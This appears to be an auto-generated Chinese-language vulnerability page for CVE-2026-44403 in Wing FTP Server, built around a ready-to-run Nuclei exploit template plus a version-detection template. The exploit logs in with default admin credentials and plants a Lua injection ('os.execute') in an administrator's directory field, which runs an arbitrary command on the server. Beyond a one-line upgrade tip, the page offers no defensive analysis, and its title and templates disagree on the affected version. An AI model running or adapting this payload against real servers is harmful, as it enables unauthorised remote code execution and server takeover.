[remote] Wing FTP Server 8.1.3 - Authenticated Remote Code Execution
CVE-2026-44403
漏洞
High · CVSS N/A📋 漏洞基础信息
| CVE | CVE-2026-44403 |
|---|---|
| 漏洞类型 | 漏洞 |
| 受影响版本 | 详见原文 |
| 危害等级 | High · CVSS N/A |
| 发布日期 | 2026-05-29 |
| 提交者 | Ünsal Furkan Harani |
| 来源 | Exploit-DB 原文 ↗ |
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2026-44403-exploit
info:
name: Wing FTP Server 8.1.2 - Authenticated Remote Code Execution
author: your-username
severity: critical
description: Exploits CVE-2026-44403 to execute arbitrary commands via Lua injection in domain admin basefolder field
reference:
- https://www.wftpserver.com/
- https://www.wftpserver.com/download.htm
tags: cve,cve2026,wingftp,rce,authenticated,exploit
variables:
username: 'admin'
password: 'admin'
cmdid: 'id'
poisonadminuser: 'eviladmin'
poisonadminpass: 'evilpass'
http:
- raw:
- |
POST /service_login.html HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/admin_login.html
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
- |
POST /service_add_admin.html HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/main.html
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxyz
------WebKitFormBoundaryxyz
Content-Disposition: form-data; name="admin"
{"username":"{{poisonadminuser}}","password":"{{poisonadminpass}}","readonly":false,"domainadmin":1,"domainlist":"","mydirectory":"/tmp/x]]os.execute('{{cmdid}} > /tmp/out.txt')--","ipmasks":[],"enable_two_factor":false,"two_factor_code":""}
------WebKitFormBoundaryxyz--
- |
POST /service_login.html HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/admin_login.html
Content-Type: application/x-www-form-urlencoded
username={{poisonadminuser}}&password={{poisonadminpass}}
- |
GET /main.html HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "contains(body_4, 'logged in ok') || contains(body_4, 'main.html')"
extractors:
- type: regex
name: session_cookie
part: header
regex:
- 'UIDADMIN=[^;]+'
group: 1
internal: true
cookie-reuse: true
redirects: false
- raw:
- |
POST /service_login.html HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/admin_login.html
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
- |
POST /service_modify_admin.html HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/main.html
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxyz
------WebKitFormBoundaryxyz
Content-Disposition: form-data; name="admin"
{"username":"{{poisonadminuser}}","password":"{{poisonadminpass}}","readonly":false,"domainadmin":1,"domainlist":"","mydirectory":"/tmp/x]]os.execute('{{cmdid}} > /tmp/out.txt')--","ipmasks":[],"enable_two_factor":false,"two_factor_code":""}
------WebKitFormBoundaryxyz
Content-Disposition: form-data; name="oldname"
{{poisonadminuser}}
------WebKitFormBoundaryxyz--
- |
POST /service_login.html HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/admin_login.html
Content-Type: application/x-www-form-urlencoded
username={{poisonadminuser}}&password={{poisonadminpass}}
- |
GET /main.html HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "contains(body_1, 'code\":0') || contains(body_1, 'logged in ok')"
- "contains(body_2, 'code\":0')"
- "contains(body_3, 'code\":0') || contains(body_3, 'logged in ok')"
condition: and
cookie-reuse: true
redirects: false🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2026-44403-detection
info:
name: Wing FTP Server 8.1.2 - Version Detection
author: your-username
severity: medium
description: Detects Wing FTP Server version <= 8.1.2 which is vulnerable to CVE-2026-44403
tags: cve,cve2026,wingftp,rce,authenticated
http:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}/favicon.ico"
- "{{BaseURL}}/admin_login.html"
matchers-condition: or
matchers:
- type: word
words:
- "Wing FTP Server"
part: body
- type: word
words:
- "wingftp"
part: body
extractors:
- type: regex
name: version
part: body
group: 1
regex:
- 'Wing FTP Server v?(\d+\.\d+\.\d+)'
- 'v?(\d+\.\d+\.\d+).*Wing FTP'
- method: GET
path:
- "{{BaseURL}}/version.txt"
- "{{BaseURL}}/admin/version.txt"
- "{{BaseURL}}/wingftp_version"
matchers:
- type: word
words:
- "Wing FTP Server"
part: body
extractors:
- type: regex
name: version
part: body
group: 1
regex:
- 'Wing FTP Server v?(\d+\.\d+\.\d+)'
- 'v?(\d+\.\d+\.\d+)'🛡️ 修复建议
请升级到厂商最新安全版本。
📎 参考链接
🚨 威胁评估
| 📈 EPSS 利用概率 | 暂无数据 |
| 🚨 CISA KEV | 未被已知利用 |
| 🔧 公开 PoC | 暂无公开 PoC |
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-06-01 08:08 | 来源: Exploit-DB